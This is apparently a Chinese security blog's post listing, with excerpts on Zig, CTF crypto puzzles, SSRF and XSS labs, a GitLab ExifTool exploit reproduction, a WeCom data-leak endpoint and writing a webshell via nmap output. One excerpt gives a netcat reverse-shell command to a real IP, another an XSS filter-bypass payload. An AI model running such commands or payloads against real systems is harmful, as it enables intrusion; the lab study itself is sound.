摘要: zig学习笔记:一 HelloWorld const std = @import("std"); // 运行测试 会显示:ALL 1 test passed // const expect = std.testing.expect; // test "always success" { // try 阅读全文
posted @ 2024-08-11 21:27 Dixk-BXy 阅读(2) 评论(0) 推荐(0) 编辑
摘要: 1、通过企微开发文档中我们可以发现,access_token的优先级最高,获取access_token的方法需要corpid与corpsecret的值,因此在此次漏洞事件中,用户直接访问“host/cgi-bin/gateway/agentinfo”即可获得全量信息,然而在微信官方API文档中却未发 阅读全文
posted @ 2023-08-14 14:29 Dixk-BXy 阅读(79) 评论(0) 推荐(0) 编辑
摘要: 回想初学Java时好高骛远,连"Hello World"都打不明白的时候便想着解决反射,实在是惭愧惭愧 阅读全文
posted @ 2023-08-14 14:12 Dixk-BXy 阅读(49) 评论(0) 推荐(0) 编辑
摘要: 下载Pikachu靶场:https://github.com/zhuifengshaonianhanlu/pikachu Windows用phpstudy也行,记得要改config.inc文件 打开SSRF靶场 如概述所说 SSRF(Server-Side Request Forgery:服务器端请 阅读全文
posted @ 2021-12-27 22:47 Dixk-BXy 阅读(410) 评论(0) 推荐(0) 编辑
摘要: 此次针对的是通过Get请求进行插入的XSS语句,或者dom型的xss,也算是了解到的新的插入方式 首先,JavaScript语言中存在拼接性 可以通过代审后闭合前置语句进行self测试是否可以拼接 self['al'+'ert'] 可以拼接,尝试运行 确实可以运行,除了self之外还有this也可以 阅读全文
posted @ 2021-12-09 14:40 Dixk-BXy 阅读(117) 评论(0) 推荐(0) 编辑
摘要: 0x01 影响范围:Gitlab version < 13.10.3 漏洞原理:https://devcraft.io/2021/05/04/exiftool-arbitrary-code-execution-cve-2021-22204.html 0x02 开始复现 首先下载Exp,开始准备复现 阅读全文
posted @ 2021-10-29 23:46 Dixk-BXy 阅读(412) 评论(0) 推荐(0) 编辑
摘要: VPS监听: aliyun: nc -lvnp 7777 监听7777端口 被监听: nc -w 10 -e /bin/bash 8.130.49.121 7777 (-w:连接超时时间 -e 使用bash命令 ip 端口号) 阅读全文
posted @ 2021-10-27 16:17 Dixk-BXy 阅读(96) 评论(0) 推荐(0) 编辑
摘要: 看题目,摩丝=莫斯 .. .-.. ...- . -.-- ..- 密文直接用http://www.ctftools.com/down/down/passwd/解密,得到明文 小写不行全改为大写试试 成功 阅读全文
posted @ 2021-10-15 17:00 Dixk-BXy 阅读(158) 评论(0) 推荐(0) 编辑
摘要: 下载附件 得到txt文件 WTF?synt是啥,百度搜一下 原来是ROT13...,凯撒密码的变种 只要看到synt先考虑rot13的解密 解码,得到flag 阅读全文
posted @ 2021-10-15 16:56 Dixk-BXy 阅读(133) 评论(0) 推荐(0) 编辑
摘要: 打开靶机 一开始很懵,以为要用 | 来拼接命令,研究了一会之后发现居然是利用nmap的功能来写入木马... 先猜执行语句 nmap xxx.xxx.xxx.xxx 关于nmap保存文件的方式,有几种主流方式 -oG:grep保存 -oN:正常保存 -oX:xml格式保存 -oA:将扫描结果以标准格式 阅读全文
posted @ 2021-09-27 16:22 Dixk-BXy 阅读(484) 评论(0) 推荐(0) 编辑
Live2D